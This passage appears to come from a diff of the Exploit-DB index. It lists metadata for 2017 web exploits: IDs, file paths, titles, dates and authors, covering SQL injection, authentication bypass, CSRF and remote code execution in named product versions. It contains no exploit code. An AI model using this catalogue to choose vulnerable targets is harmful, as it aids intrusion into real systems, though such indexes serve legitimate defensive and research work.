-42577,exploits/php/webapps/42577.txt,"CMS Web-Gooroo < 1.141 - Multiple Vulnerabilities",2017-06-01,Kaimi,php,webapps, -42578,exploits/php/webapps/42578.txt,"Schools Alert Management Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps, -42579,exploits/json/webapps/42579.txt,"NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting",2017-08-28,LiquidWorm,json,webapps, -42580,exploits/json/webapps/42580.html,"NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access)",2017-08-28,LiquidWorm,json,webapps, -42581,exploits/hardware/webapps/42581.txt,"D-Link DIR-600 - Authentication Bypass",2017-08-29,"Jithin D Kurup",hardware,webapps, -42582,exploits/php/webapps/42582.txt,"Car or Cab Booking Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps, -42583,exploits/php/webapps/42583.txt,"PHP Appointment Booking Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps, -42584,exploits/php/webapps/42584.txt,"User Login and Management - Multiple Vulnerabilities",2017-08-29,"Ali BawazeEer",php,webapps, -42585,exploits/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps, -42588,exploits/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",hardware,webapps, -42589,exploits/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",php,webapps, -42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",php,webapps, -42591,exploits/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,php,webapps, -42592,exploits/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",php,webapps, -42595,exploits/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,php,webapps, -42596,exploits/php/webapps/42596.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps, -42597,exploits/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps, -42598,exploits/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps, -42603,exploits/php/webapps/42603.txt,"FineCMS 1.0 - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps, -42606,exploits/php/webapps/42606.txt,"Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps, -42607,exploits/php/webapps/42607.txt,"Joomla! Component CheckList 1.1.0 - SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps, -42608,exploits/hardware/webapps/42608.txt,"Wireless Repeater BE126 - Remote Code Execution",2017-09-04,"Hay Mizrachi",hardware,webapps, -42610,exploits/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,multiple,webapps, -42613,exploits/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",multiple,webapps, -42615,exploits/php/webapps/42615.txt,"A2billing 2.x - SQL Injection",2017-09-05,0x4148,php,webapps, -42616,exploits/php/webapps/42616.txt,"A2billing 2.x - Backup File Download / Remote Code Execution",2017-09-04,0x4148,php,webapps, -42617,exploits/php/webapps/42617.txt,"iGreeting Cards 1.0 - SQL Injection",2017-09-04,"Ihsan Sencan",php,webapps, -42618,exploits/php/webapps/42618.txt,"WordPress Plugin Participants Database < 1.7.5.10 - Cross-Site Scripting",2017-09-01,"Benjamin Lim",php,webapps, -42619,exploits/php/webapps/42619.txt,"The Car Project 1.0 - SQL Injection",2017-09-05,"Ihsan Sencan",php,webapps, -42620,exploits/php/webapps/42620.txt,"Cory Support - 'pr' SQL Injection",2017-09-06,v3n0m,php,webapps, -42622,exploits/php/webapps/42622.html,"Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps, -42623,exploits/php/webapps/42623.txt,"Pay Banner Text Link Ad 1.0.6.1 - SQL Injection",2017-09-06,"Ihsan Sencan",php,webapps, -42628,exploits/php/webapps/42628.txt,"Ultimate HR System < 1.2 - Directory Traversal / Cross-Site Scripting",2017-09-05,8bitsec,php,webapps, -42629,exploits/php/webapps/42629.txt,"Online Invoice System 3.0 - SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps, -42631,exploits/php/webapps/42631.txt,"EzBan 5.3 - 'id' SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps, -42632,exploits/php/webapps/42632.txt,"EzInvoice 6.02 - SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps, -42633,exploits/hardware/webapps/42633.txt,"Roteador Wireless Intelbras WRN150 - Cross-Site Scripting",2017-09-07,"Elber Tavares",hardware,webapps, -42634,exploits/hardware/webapps/42634.txt,"Huawei HG255s - Directory Traversal",2017-09-07,"Ahmet Mersin",hardware,webapps, -42636,exploits/php/webapps/42636.txt,"Babysitter Website Script 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps, -42637,exploits/php/webapps/42637.txt,"Job Board Software 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps, -42638,exploits/php/webapps/42638.py,"RPi Cam Control <= 6.3.14 - Multiple Vulnerabilities",2017-08-16,"Alexander Korznikov",php,webapps, -42639,exploits/php/webapps/42639.txt,"Just Dial Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps, -42641,exploits/php/webapps/42641.txt,"Professional Service Booking 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps, -42642,exploits/php/webapps/42642.txt,"Restaurant Website Script 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps, -42643,exploits/php/webapps/42643.txt,"Law Firm 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps, -42644,exploits/php/webapps/42644.html,"Topsites Script 1.0 - Cross-Site Request Forgery / PHP Code Injection",2017-09-09,"Ihsan Sencan",php,webapps, -42645,exploits/php/webapps/42645.txt,"My Builder Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps, -42648,exploits/php/webapps/42648.html,"Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin)",2017-09-11,"Ihsan Sencan",php,webapps, -42649,exploits/hardware/webapps/42649.txt,"FiberHome ADSL AN1020-25 - Improper Access Restrictions",2017-09-05,"Ibad Shah",hardware,webapps, -42651,exploits/hardware/webapps/42651.txt,"WiseGiga NAS - Multiple Vulnerabilities",2017-09-11,"Pierre Kim",hardware,webapps, -42653,exploits/php/webapps/42653.txt,"PHP Dashboards NEW 4.4 - Arbitrary File Read",2017-09-11,"Ihsan Sencan",php,webapps, -42654,exploits/php/webapps/42654.txt,"PHP Dashboards NEW 4.4 - SQL Injection",2017-09-11,"Ihsan Sencan",php,webapps, -42655,exploits/php/webapps/42655.txt,"JobStar Monster Clone Script 1.0 - SQL Injection",2017-09-11,8bitsec,php,webapps, -42656,exploits/php/webapps/42656.txt,"iTech Book Store Script 2.02 - SQL Injection",2017-09-11,8bitsec,php,webapps, -42657,exploits/php/webapps/42657.txt,"iTech StockPhoto Script 2.02 - SQL Injection",2017-09-11,8bitsec,php,webapps, -42658,exploits/php/webapps/42658.txt,"EduStar Udemy Clone Script 1.0 - SQL Injection",2017-09-11,8bitsec,php,webapps, -42659,exploits/php/webapps/42659.txt,"AirStar Airbnb Clone Script 1.0 - SQL Injection",2017-09-11,8bitsec,php,webapps, -42660,exploits/php/webapps/42660.txt,"osTicket 1.10 - SQL Injection",2017-09-12,"Mehmet Ince",php,webapps, -42661,exploits/php/webapps/42661.txt,"FoodStar 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps, -42662,exploits/php/webapps/42662.txt,"Gr8 Multiple Search Engine Script 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps, -42663,exploits/php/webapps/42663.txt,"inClick Cloud Server 5.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps, -42667,exploits/php/webapps/42667.txt,"ICLowBidAuction 3.3 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42668,exploits/php/webapps/42668.txt,"ICMLM 2.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42669,exploits/php/webapps/42669.txt,"ICHotelReservation 3.3 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42670,exploits/php/webapps/42670.txt,"ICAuction 2.2 - 'id' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42671,exploits/php/webapps/42671.txt,"ICDoctor Appointment 1.3 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42672,exploits/php/webapps/42672.txt,"ICRestaurant software 1.4 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42673,exploits/php/webapps/42673.txt,"ICDutchAuction 1.2 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42674,exploits/php/webapps/42674.txt,"ICAutosales 2.2 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42675,exploits/php/webapps/42675.txt,"ICTraveling 2.2 - Authentication Bypass",2017-09-13,"Ihsan Sencan",php,webapps, -42677,exploits/php/webapps/42677.txt,"ICStudents 1.2 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42676,exploits/php/webapps/42676.txt,"ICClassifieds 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42678,exploits/php/webapps/42678.txt,"ICSurvey 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42679,exploits/php/webapps/42679.txt,"ICJewelry 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42680,exploits/php/webapps/42680.txt,"IC-T-Shirt 1.2 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42681,exploits/php/webapps/42681.txt,"ICProductConfigurator 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42682,exploits/php/webapps/42682.txt,"ICGrocery 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42684,exploits/php/webapps/42684.txt,"ICCallLimousine 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42685,exploits/php/webapps/42685.txt,"ICProjectBidding 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42686,exploits/php/webapps/42686.txt,"ICDental Clinic 1.2 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42687,exploits/aspx/webapps/42687.txt,"ICEstate 1.1 - 'id' SQL Injection",2017-09-13,"Ihsan Sencan",aspx,webapps, -42688,exploits/php/webapps/42688.txt,"ICHelpDesk 1.1 - 'pk' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42689,exploits/php/webapps/42689.txt,"ICSiteBuilder 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps, -42690,exploits/asp/webapps/42690.txt,"ICAffiliateTracking 1.1 - Authentication Bypass",2017-09-13,"Ihsan Sencan",asp,webapps, -42699,exploits/windows/webapps/42699.rb,"Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps, -42705,exploits/windows/webapps/42705.rb,"Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal File Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps, -42706,exploits/windows/webapps/42706.rb,"Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps, -42707,exploits/windows/webapps/42707.txt,"Carel PlantVisor 2.4.4 - Directory Traversal",2011-09-13,"Luigi Auriemma",windows,webapps, -42713,exploits/php/webapps/42713.txt,"Enterprise Edition Payment Processor Script 3.7 - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps, -42714,exploits/php/webapps/42714.txt,"Adserver Script 5.6 - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps, -42715,exploits/php/webapps/42715.txt,"PTC KSV1 Script 1.7 - 'type' SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps, -42716,exploits/php/webapps/42716.txt,"Theater Management Script - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps, -42717,exploits/php/webapps/42717.txt,"Justdial Clone Script - 'fid' SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps, -42727,exploits/php/webapps/42727.txt,"XYZ Auto Classifieds 1.0 - SQL Injection",2017-09-12,8bitsec,php,webapps, -42728,exploits/php/webapps/42728.txt,"Consumer Review Script 1.0 - SQL Injection",2017-09-12,8bitsec,php,webapps, -42729,exploits/hardware/webapps/42729.py,"D-Link DIR-8xx Routers - Leak Credentials",2017-09-12,embedi,hardware,webapps, -42730,exploits/hardware/webapps/42730.py,"D-Link DIR-8xx Routers - Root Remote Code Execution",2017-09-12,embedi,hardware,webapps, -42731,exploits/hardware/webapps/42731.sh,"D-Link DIR-8xx Routers - Local Firmware Upload",2017-09-12,embedi,hardware,webapps, -42732,exploits/hardware/webapps/42732.py,"Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass",2017-09-14,Kivson,hardware,webapps, -42733,exploits/php/webapps/42733.txt,"PTCEvolution 5.50 - SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps, -42734,exploits/php/webapps/42734.txt,"Contact Manager 1.0 - 'femail' SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps, -42736,exploits/asp/webapps/42736.py,"Digirez 3.4 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",asp,webapps, -42737,exploits/asp/webapps/42737.py,"Digileave 1.2 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",asp,webapps, -42738,exploits/asp/webapps/42738.py,"DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",asp,webapps, -42739,exploits/hardware/webapps/42739.txt,"UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass",2017-09-15,"Gem George",hardware,webapps, -42740,exploits/hardware/webapps/42740.txt,"iBall ADSL2+ Home Router - Authentication Bypass",2017-09-18,"Gem George",hardware,webapps, -42745,exploits/linux/webapps/42745.py,"Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak",2017-09-18,"Hanno Bock",linux,webapps, -42751,exploits/php/webapps/42751.txt,"Foodspotting Clone 1.0 - SQL Injection",2017-09-13,8bitsec,php,webapps, -42752,exploits/php/webapps/42752.txt,"iTech Gigs Script 1.20 - 'cat' SQL Injection",2017-09-15,8bitsec,php,webapps, -42754,exploits/php/webapps/42754.txt,"Tecnovision DLX Spot - Authentication Bypass",2017-05-19,"Simon Brannstrom",php,webapps, -42755,exploits/php/webapps/42755.txt,"Tecnovision DLX Spot - Arbitrary File Upload",2017-05-19,"Simon Brannstrom",php,webapps, -42761,exploits/php/webapps/42761.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (1)",2017-09-21,"Ishaq Mohammed",php,webapps, -42768,exploits/php/webapps/42768.pl,"Stock Photo Selling 1.0 - SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps, -42769,exploits/linux/webapps/42769.rb,"DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit)",2017-09-19,"Mehmet Ince",linux,webapps, -42770,exploits/php/webapps/42770.txt,"Lending And Borrowing - 'pid' SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps, -42771,exploits/php/webapps/42771.txt,"Multi Level Marketing - SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps, -42772,exploits/php/webapps/42772.pl,"Cash Back Comparison Script 1.0 - SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps, -42773,exploits/php/webapps/42773.txt,"Claydip Airbnb Clone 1.0 - Arbitrary File Upload",2017-09-22,"Ihsan Sencan",php,webapps, -42774,exploits/php/webapps/42774.txt,"Secure E-commerce Script 1.02 - 'sid' SQL Injection",2017-09-22,8bitsec,php,webapps, -42775,exploits/php/webapps/42775.txt,"PHP Auction Ecommerce Script 1.6 - SQL Injection",2017-09-22,8bitsec,php,webapps, -42776,exploits/asp/webapps/42776.txt,"JitBit HelpDesk < 9.0.2 - Authentication Bypass",2017-09-22,Kc57,asp,webapps, -42785,exploits/hardware/webapps/42785.sh,"FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution",2017-09-25,LiquidWorm,hardware,webapps, -42786,exploits/hardware/webapps/42786.txt,"FLIR Thermal Camera F/FC/PT/D - Information Disclosure",2017-09-25,LiquidWorm,hardware,webapps, -42788,exploits/hardware/webapps/42788.txt,"FLIR Thermal Camera FC-S/PT - Command Injection",2017-09-25,LiquidWorm,hardware,webapps, -42789,exploits/hardware/webapps/42789.txt,"FLIR Thermal Camera F/FC/PT/D - Stream Disclosure",2017-09-25,LiquidWorm,hardware,webapps, -42792,exploits/asp/webapps/42792.txt,"Sitefinity CMS 9.2 - Cross-Site Scripting",2017-08-31,"Pralhad Chaskar",asp,webapps, -42794,exploits/php/webapps/42794.txt,"WordPress Plugin Content Timeline - SQL Injection",2017-09-16,"Jeroen - IT Nerdbox",php,webapps, -42795,exploits/php/webapps/42795.txt,"Job Links - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps, -42796,exploits/php/webapps/42796.txt,"TicketPlus - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps, -42797,exploits/php/webapps/42797.txt,"Photo Fusion - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps, -42798,exploits/php/webapps/42798.txt,"SMSmaster - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps, -42799,exploits/php/webapps/42799.txt,"AMC Master - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps, -42800,exploits/php/webapps/42800.txt,"WordPress Plugin WPCHURCH - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps, -42801,exploits/php/webapps/42801.txt,"WordPress Plugin WPGYM - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps, -42802,exploits/php/webapps/42802.txt,"WordPress Plugin Hospital Management System - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps, -42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,multiple,webapps, -42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps, -42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,php,webapps, -42892,exploits/windows/webapps/42892.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption",2017-09-28,hyp3rlinx,windows,webapps, -42893,exploits/php/webapps/42893.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure",2017-09-28,hyp3rlinx,php,webapps, -42894,exploits/php/webapps/42894.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery",2017-09-28,hyp3rlinx,php,webapps, -42895,exploits/php/webapps/42895.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection",2017-09-28,hyp3rlinx,php,webapps, -42916,exploits/hardware/webapps/42916.py,"Roteador Wireless Intelbras WRN150 - Autentication Bypass",2017-09-28,"Elber Tavares",hardware,webapps, -42919,exploits/php/webapps/42919.txt,"Easy Blog PHP Script 1.3a - 'id' SQL Injection",2017-09-28,8bitsec,php,webapps, -42922,exploits/php/webapps/42922.py,"FileRun < 2017.09.18 - SQL Injection",2017-09-29,SPARC,php,webapps, -42923,exploits/aspx/webapps/42923.txt,"SmarterStats 11.3.6347 - Cross-Site Scripting",2017-09-27,sqlhacker,aspx,webapps, -42924,exploits/php/webapps/42924.txt,"WordPress Plugin WPHRM - SQL Injection",2017-09-29,"Ihsan Sencan",php,webapps, -42925,exploits/php/webapps/42925.txt,"PHP Multi Vendor Script 1.02 - 'sid' SQL Injection",2017-09-28,8bitsec,php,webapps, -42926,exploits/php/webapps/42926.txt,"Real Estate MLM plan script 1.0 - 'srch' SQL Injection",2017-09-28,8bitsec,php,webapps, -42927,exploits/php/webapps/42927.txt,"ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download",2017-09-29,"Ihsan Sencan",php,webapps, -42931,exploits/hardware/webapps/42931.txt,"HBGK DVR 3.0.0 build20161206 - Authentication Bypass",2017-09-24,"RAT - ThiefKing",hardware,webapps, -42933,exploits/hardware/webapps/42933.txt,"NPM-V (Network Power Manager) 2.4.1 - Password Reset",2017-10-02,"Saeed reza Zamanian",hardware,webapps, -42934,exploits/php/webapps/42934.txt,"phpCollab 2.5.1 - Arbitrary File Upload",2017-10-02,Sysdream,php,webapps, -42935,exploits/php/webapps/42935.txt,"phpCollab 2.5.1 - SQL Injection",2017-10-02,Sysdream,php,webapps, -42939,exploits/jsp/webapps/42939.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps, -42940,exploits/jsp/webapps/42940.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps, -42947,exploits/hardware/webapps/42947.txt,"Fiberhome AN5506-04-F - Command Injection",2017-10-03,Tauco,hardware,webapps, -42950,exploits/php/webapps/42950.txt,"EPESI 1.8.2 rev20170830 - Cross-Site Scripting",2017-10-03,"Zeeshan Shaikh",php,webapps, -42953,exploits/windows/webapps/42953.txt,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)",2017-09-20,xxlegend,windows,webapps, -42954,exploits/php/webapps/42954.py,"ClipBucket 2.8.3 - Remote Code Execution",2017-10-04,"Meisam Monsef",php,webapps, -42956,exploits/hardware/webapps/42956.txt,"NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution",2017-09-27,"Kacper Szurek",hardware,webapps, -42959,exploits/php/webapps/42959.py,"Unitrends UEB 9.1 - Privilege Escalation",2017-08-08,"Jared Arave",php,webapps, -42961,exploits/ruby/webapps/42961.txt,"Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery",2017-08-30,"Dhiraj Mishra",ruby,webapps, -42966,exploits/jsp/webapps/42966.py,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)",2017-10-09,intx0x80,jsp,webapps, -42967,exploits/php/webapps/42967.txt,"ClipShare 7.0 - SQL Injection",2017-10-09,8bitsec,php,webapps, -42968,exploits/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,php,webapps, -43013,exploits/cgi/webapps/43013.txt,"Linksys E Series - Multiple Vulnerabilities",2017-10-18,"SEC Consult",cgi,webapps, -42971,exploits/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps, -42972,exploits/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps, -42975,exploits/linux/webapps/42975.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal",2017-10-11,"Leonardo Duarte",linux,webapps, -42978,exploits/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",php,webapps, -42979,exploits/php/webapps/42979.txt,"E-Sic Software livre CMS - 'q' SQL Injection",2017-10-12,"Guilherme Assmann",php,webapps, -42980,exploits/php/webapps/42980.txt,"E-Sic Software livre CMS - Autentication Bypass",2017-10-12,"Elber Tavares",php,webapps, -42981,exploits/php/webapps/42981.txt,"E-Sic Software livre CMS - 'cpfcnpj' SQL Injection",2017-10-12,"Elber Tavares",php,webapps, -42982,exploits/php/webapps/42982.txt,"E-Sic Software livre CMS - 'f' SQL Injection",2017-10-12,"Elber Tavares",php,webapps, -42983,exploits/php/webapps/42983.txt,"E-Sic Software livre CMS - Cross Site Scripting",2017-10-12,"Elber Tavares",php,webapps, -42985,exploits/php/webapps/42985.txt,"TYPO3 Extension Restler 1.7.0 - Local File Disclosure",2017-10-13,CrashBandicot,php,webapps, -42986,exploits/hardware/webapps/42986.txt,"Dreambox Plugin BouquetEditor - Cross-Site Scripting",2017-10-12,"Thiago Sena",hardware,webapps, -42987,exploits/php/webapps/42987.txt,"phpMyFAQ 2.9.8 - Cross-Site Scripting (2)",2017-10-13,"Ishaq Mohammed",php,webapps, -42988,exploits/php/webapps/42988.txt,"AlienVault Unified Security Management (USM) 5.4.2 - Cross-Site Request Forgery",2017-10-13,"Julien Ahrens",php,webapps, -42989,exploits/cgi/webapps/42989.txt,"Webmin 1.850 - Multiple Vulnerabilities",2017-10-15,hyp3rlinx,cgi,webapps, -42991,exploits/linux/webapps/42991.txt,"3CX Phone System 15.5.3554.1 - Directory Traversal",2017-10-16,"Jens Regel",linux,webapps, -42993,exploits/php/webapps/42993.txt,"Squid Analysis Report Generator 2.3.10 - Remote Code Execution",2017-10-17,"Pavel Suprunyuk",php,webapps, -43002,exploits/multiple/webapps/43002.py,"OpenText Documentum Content Server - Privilege Escalation",2017-10-17,"Andrey B. Panfilov",multiple,webapps, -43003,exploits/multiple/webapps/43003.py,"OpenText Documentum Content Server - Arbitrary File Download Privilege Escalation",2017-10-17,"Andrey B. Panfilov",multiple,webapps, -43004,exploits/multiple/webapps/43004.py,"OpenText Documentum Content Server - 'dmr_content' Privilege Escalation",2017-10-17,"Andrey B. Panfilov",multiple,webapps, -43005,exploits/multiple/webapps/43005.py,"OpenText Documentum Content Server - Arbitrary File Download",2017-10-17,"Andrey B. Panfilov",multiple,webapps, -43009,exploits/xml/webapps/43009.txt,"Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution",2017-10-17,"Michael Stepankin & Olga Barinova",xml,webapps, -43011,exploits/php/webapps/43011.txt,"Career Portal 1.0 - SQL Injection",2017-10-17,8bitsec,php,webapps, -43012,exploits/php/webapps/43012.txt,"WordPress Plugin Car Park Booking - SQL Injection",2017-10-17,8bitsec,php,webapps, -43015,exploits/php/webapps/43015.txt,"Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities",2017-10-18,"SEC Consult",php,webapps, -43023,exploits/hardware/webapps/43023.txt,"TP-Link TL-MR3220 - Cross-Site Scripting",2017-10-12,"Thiago Sena",hardware,webapps, -43018,exploits/windows/webapps/43018.html,"ZKTime Web Software 2.0 - Cross-Site Request Forgery",2017-08-18,"Arvind V",windows,webapps, -43019,exploits/windows/webapps/43019.txt,"ZKTime Web Software 2.0 - Improper Access Restrictions",2017-08-18,"Arvind V",windows,webapps, -43021,exploits/python/webapps/43021.py,"Check_MK 1.2.8p25 - Information Disclosure",2017-10-18,"Julien Ahrens",python,webapps, -43022,exploits/hardware/webapps/43022.py,"TP-Link WR940N - Authenticated Remote Code",2017-10-17,"Fidus InfoSecurity",hardware,webapps, -43024,exploits/multiple/webapps/43024.txt,"Logitech Media Server - Cross-Site Scripting",2017-10-14,"Thiago Sena",multiple,webapps, -43027,exploits/php/webapps/43027.txt,"CometChat < 6.2.0 BETA 1 - Local File Inclusion",2017-10-22,Paradoxis,php,webapps, -43028,exploits/php/webapps/43028.py,"Kaltura < 13.2.0 - Remote Code Execution",2017-10-23,"Robin Verton",php,webapps, -43034,exploits/php/webapps/43034.txt,"FS Car Rental Script - 'pickup_location' SQL Injection",2017-10-23,8bitsec,php,webapps, -43035,exploits/php/webapps/43035.txt,"FS Amazon Clone - 'category_id' SQL Injection",2017-10-23,8bitsec,php,webapps, -43036,exploits/php/webapps/43036.txt,"FS Book Store Script - 'category' SQL Injection",2017-10-23,8bitsec,php,webapps, -43037,exploits/php/webapps/43037.txt,"FS Ebay Clone - 'pd_maincat_id' SQL Injection",2017-10-23,8bitsec,php,webapps, -43038,exploits/php/webapps/43038.txt,"FS Food Delivery Script - 'keywords' SQL Injection",2017-10-23,8bitsec,php,webapps, -43039,exploits/php/webapps/43039.txt,"FS Expedia Clone - 'hid' SQL Injection",2017-10-23,8bitsec,php,webapps, -43040,exploits/php/webapps/43040.txt,"FS Freelancer Clone - 'sk' SQL Injection",2017-10-23,8bitsec,php,webapps, -43041,exploits/php/webapps/43041.txt,"FS Groupon Clone - 'category' SQL Injection",2017-10-23,8bitsec,php,webapps, -43042,exploits/php/webapps/43042.txt,"FS Indiamart Clone - 'keywords' SQL Injection",2017-10-23,8bitsec,php,webapps, -43043,exploits/php/webapps/43043.txt,"FS Lynda Clone - 'category' SQL Injection",2017-10-23,8bitsec,php,webapps, -43044,exploits/php/webapps/43044.txt,"FS OLX Clone - 'catg_id' SQL Injection",2017-10-23,8bitsec,php,webapps, -43045,exploits/cfm/webapps/43045.txt,"Mura CMS < 6.2 - Server-Side Request Forgery / XML External Entity Injection",2017-10-24,"Anthony Cole",cfm,webapps, -43046,exploits/php/webapps/43046.txt,"FS Shutter Stock Clone - 'keywords' SQL 